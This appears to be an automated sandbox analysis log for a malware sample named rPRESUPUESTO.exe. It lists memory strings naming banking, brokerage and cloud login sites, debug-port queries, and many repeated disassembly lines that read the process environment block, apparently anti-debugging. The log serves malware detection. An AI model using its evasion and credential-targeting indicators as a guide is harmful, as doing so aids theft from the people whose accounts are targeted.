            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4587902470.0000000001349000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 07c402-5.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 07c402-5.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 07c402-5.9.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 07c402-5.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 07c402-5.9.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 07c402-5.9.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 07c402-5.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: firefox.exe, 0000000D.00000002.2619239385.000001F415C3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGGJ
            Source: 07c402-5.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: ktmutil.exe, 00000009.00000002.4587088156.00000000005F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|(TE
            Source: 07c402-5.9.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 07c402-5.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 07c402-5.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0181096E rdtsc 5_2_0181096E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_00417BB3 LdrLoadDll,5_2_00417BB3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188C188 mov eax, dword ptr fs:[00000030h]5_2_0188C188
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188C188 mov eax, dword ptr fs:[00000030h]5_2_0188C188
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01810185 mov eax, dword ptr fs:[00000030h]5_2_01810185
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01874180 mov eax, dword ptr fs:[00000030h]5_2_01874180
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01874180 mov eax, dword ptr fs:[00000030h]5_2_01874180
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185019F mov eax, dword ptr fs:[00000030h]5_2_0185019F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185019F mov eax, dword ptr fs:[00000030h]5_2_0185019F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185019F mov eax, dword ptr fs:[00000030h]5_2_0185019F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185019F mov eax, dword ptr fs:[00000030h]5_2_0185019F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6154 mov eax, dword ptr fs:[00000030h]5_2_017D6154
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6154 mov eax, dword ptr fs:[00000030h]5_2_017D6154
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CC156 mov eax, dword ptr fs:[00000030h]5_2_017CC156
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018961C3 mov eax, dword ptr fs:[00000030h]5_2_018961C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018961C3 mov eax, dword ptr fs:[00000030h]5_2_018961C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E1D0 mov eax, dword ptr fs:[00000030h]5_2_0184E1D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E1D0 mov eax, dword ptr fs:[00000030h]5_2_0184E1D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0184E1D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E1D0 mov eax, dword ptr fs:[00000030h]5_2_0184E1D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E1D0 mov eax, dword ptr fs:[00000030h]5_2_0184E1D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A61E5 mov eax, dword ptr fs:[00000030h]5_2_018A61E5
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018001F8 mov eax, dword ptr fs:[00000030h]5_2_018001F8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov eax, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov ecx, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov eax, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov eax, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov ecx, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov eax, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov eax, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov ecx, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov eax, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E10E mov ecx, dword ptr fs:[00000030h]5_2_0187E10E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01890115 mov eax, dword ptr fs:[00000030h]5_2_01890115
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187A118 mov ecx, dword ptr fs:[00000030h]5_2_0187A118
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187A118 mov eax, dword ptr fs:[00000030h]5_2_0187A118
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187A118 mov eax, dword ptr fs:[00000030h]5_2_0187A118
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187A118 mov eax, dword ptr fs:[00000030h]5_2_0187A118
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01800124 mov eax, dword ptr fs:[00000030h]5_2_01800124
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01864144 mov eax, dword ptr fs:[00000030h]5_2_01864144
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01864144 mov eax, dword ptr fs:[00000030h]5_2_01864144
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01864144 mov ecx, dword ptr fs:[00000030h]5_2_01864144
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01864144 mov eax, dword ptr fs:[00000030h]5_2_01864144
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01864144 mov eax, dword ptr fs:[00000030h]5_2_01864144
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01868158 mov eax, dword ptr fs:[00000030h]5_2_01868158
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CA197 mov eax, dword ptr fs:[00000030h]5_2_017CA197
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CA197 mov eax, dword ptr fs:[00000030h]5_2_017CA197
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CA197 mov eax, dword ptr fs:[00000030h]5_2_017CA197
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4164 mov eax, dword ptr fs:[00000030h]5_2_018A4164
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4164 mov eax, dword ptr fs:[00000030h]5_2_018A4164
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FC073 mov eax, dword ptr fs:[00000030h]5_2_017FC073
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D2050 mov eax, dword ptr fs:[00000030h]5_2_017D2050
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018680A8 mov eax, dword ptr fs:[00000030h]5_2_018680A8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018960B8 mov eax, dword ptr fs:[00000030h]5_2_018960B8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018960B8 mov ecx, dword ptr fs:[00000030h]5_2_018960B8
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018520DE mov eax, dword ptr fs:[00000030h]5_2_018520DE
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CA020 mov eax, dword ptr fs:[00000030h]5_2_017CA020
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CC020 mov eax, dword ptr fs:[00000030h]5_2_017CC020
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018560E0 mov eax, dword ptr fs:[00000030h]5_2_018560E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE016 mov eax, dword ptr fs:[00000030h]5_2_017EE016
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE016 mov eax, dword ptr fs:[00000030h]5_2_017EE016
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE016 mov eax, dword ptr fs:[00000030h]5_2_017EE016
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE016 mov eax, dword ptr fs:[00000030h]5_2_017EE016
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018120F0 mov ecx, dword ptr fs:[00000030h]5_2_018120F0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01854000 mov ecx, dword ptr fs:[00000030h]5_2_01854000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01872000 mov eax, dword ptr fs:[00000030h]5_2_01872000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CC0F0 mov eax, dword ptr fs:[00000030h]5_2_017CC0F0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D80E9 mov eax, dword ptr fs:[00000030h]5_2_017D80E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CA0E3 mov ecx, dword ptr fs:[00000030h]5_2_017CA0E3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01866030 mov eax, dword ptr fs:[00000030h]5_2_01866030
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856050 mov eax, dword ptr fs:[00000030h]5_2_01856050
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C80A0 mov eax, dword ptr fs:[00000030h]5_2_017C80A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D208A mov eax, dword ptr fs:[00000030h]5_2_017D208A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188C3CD mov eax, dword ptr fs:[00000030h]5_2_0188C3CD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018563C0 mov eax, dword ptr fs:[00000030h]5_2_018563C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018743D4 mov eax, dword ptr fs:[00000030h]5_2_018743D4
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018743D4 mov eax, dword ptr fs:[00000030h]5_2_018743D4
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E3DB mov eax, dword ptr fs:[00000030h]5_2_0187E3DB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E3DB mov eax, dword ptr fs:[00000030h]5_2_0187E3DB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E3DB mov ecx, dword ptr fs:[00000030h]5_2_0187E3DB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187E3DB mov eax, dword ptr fs:[00000030h]5_2_0187E3DB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CC310 mov ecx, dword ptr fs:[00000030h]5_2_017CC310
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F0310 mov ecx, dword ptr fs:[00000030h]5_2_017F0310
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018063FF mov eax, dword ptr fs:[00000030h]5_2_018063FF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A30B mov eax, dword ptr fs:[00000030h]5_2_0180A30B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A30B mov eax, dword ptr fs:[00000030h]5_2_0180A30B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A30B mov eax, dword ptr fs:[00000030h]5_2_0180A30B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE3F0 mov eax, dword ptr fs:[00000030h]5_2_017EE3F0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE3F0 mov eax, dword ptr fs:[00000030h]5_2_017EE3F0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE3F0 mov eax, dword ptr fs:[00000030h]5_2_017EE3F0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E03E9 mov eax, dword ptr fs:[00000030h]5_2_017E03E9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A8324 mov eax, dword ptr fs:[00000030h]5_2_018A8324
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A8324 mov ecx, dword ptr fs:[00000030h]5_2_018A8324
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A8324 mov eax, dword ptr fs:[00000030h]5_2_018A8324
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A8324 mov eax, dword ptr fs:[00000030h]5_2_018A8324
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA3C0 mov eax, dword ptr fs:[00000030h]5_2_017DA3C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA3C0 mov eax, dword ptr fs:[00000030h]5_2_017DA3C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA3C0 mov eax, dword ptr fs:[00000030h]5_2_017DA3C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA3C0 mov eax, dword ptr fs:[00000030h]5_2_017DA3C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA3C0 mov eax, dword ptr fs:[00000030h]5_2_017DA3C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA3C0 mov eax, dword ptr fs:[00000030h]5_2_017DA3C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D83C0 mov eax, dword ptr fs:[00000030h]5_2_017D83C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D83C0 mov eax, dword ptr fs:[00000030h]5_2_017D83C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D83C0 mov eax, dword ptr fs:[00000030h]5_2_017D83C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D83C0 mov eax, dword ptr fs:[00000030h]5_2_017D83C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A634F mov eax, dword ptr fs:[00000030h]5_2_018A634F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01852349 mov eax, dword ptr fs:[00000030h]5_2_01852349
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01878350 mov ecx, dword ptr fs:[00000030h]5_2_01878350
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185035C mov eax, dword ptr fs:[00000030h]5_2_0185035C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185035C mov eax, dword ptr fs:[00000030h]5_2_0185035C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185035C mov eax, dword ptr fs:[00000030h]5_2_0185035C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185035C mov ecx, dword ptr fs:[00000030h]5_2_0185035C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185035C mov eax, dword ptr fs:[00000030h]5_2_0185035C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185035C mov eax, dword ptr fs:[00000030h]5_2_0185035C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189A352 mov eax, dword ptr fs:[00000030h]5_2_0189A352
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8397 mov eax, dword ptr fs:[00000030h]5_2_017C8397
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8397 mov eax, dword ptr fs:[00000030h]5_2_017C8397
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8397 mov eax, dword ptr fs:[00000030h]5_2_017C8397
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F438F mov eax, dword ptr fs:[00000030h]5_2_017F438F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F438F mov eax, dword ptr fs:[00000030h]5_2_017F438F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE388 mov eax, dword ptr fs:[00000030h]5_2_017CE388
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE388 mov eax, dword ptr fs:[00000030h]5_2_017CE388
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE388 mov eax, dword ptr fs:[00000030h]5_2_017CE388
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187437C mov eax, dword ptr fs:[00000030h]5_2_0187437C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E284 mov eax, dword ptr fs:[00000030h]5_2_0180E284
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E284 mov eax, dword ptr fs:[00000030h]5_2_0180E284
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01850283 mov eax, dword ptr fs:[00000030h]5_2_01850283
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01850283 mov eax, dword ptr fs:[00000030h]5_2_01850283
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01850283 mov eax, dword ptr fs:[00000030h]5_2_01850283
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C826B mov eax, dword ptr fs:[00000030h]5_2_017C826B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4260 mov eax, dword ptr fs:[00000030h]5_2_017D4260
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4260 mov eax, dword ptr fs:[00000030h]5_2_017D4260
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4260 mov eax, dword ptr fs:[00000030h]5_2_017D4260
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D6259 mov eax, dword ptr fs:[00000030h]5_2_017D6259
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov ecx, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CA250 mov eax, dword ptr fs:[00000030h]5_2_017CA250
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C823B mov eax, dword ptr fs:[00000030h]5_2_017C823B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A62D6 mov eax, dword ptr fs:[00000030h]5_2_018A62D6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02E1 mov eax, dword ptr fs:[00000030h]5_2_017E02E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02E1 mov eax, dword ptr fs:[00000030h]5_2_017E02E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02E1 mov eax, dword ptr fs:[00000030h]5_2_017E02E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01858243 mov eax, dword ptr fs:[00000030h]5_2_01858243
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01858243 mov ecx, dword ptr fs:[00000030h]5_2_01858243
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A625D mov eax, dword ptr fs:[00000030h]5_2_018A625D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A250 mov eax, dword ptr fs:[00000030h]5_2_0188A250
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A250 mov eax, dword ptr fs:[00000030h]5_2_0188A250
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02A0 mov eax, dword ptr fs:[00000030h]5_2_017E02A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02A0 mov eax, dword ptr fs:[00000030h]5_2_017E02A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
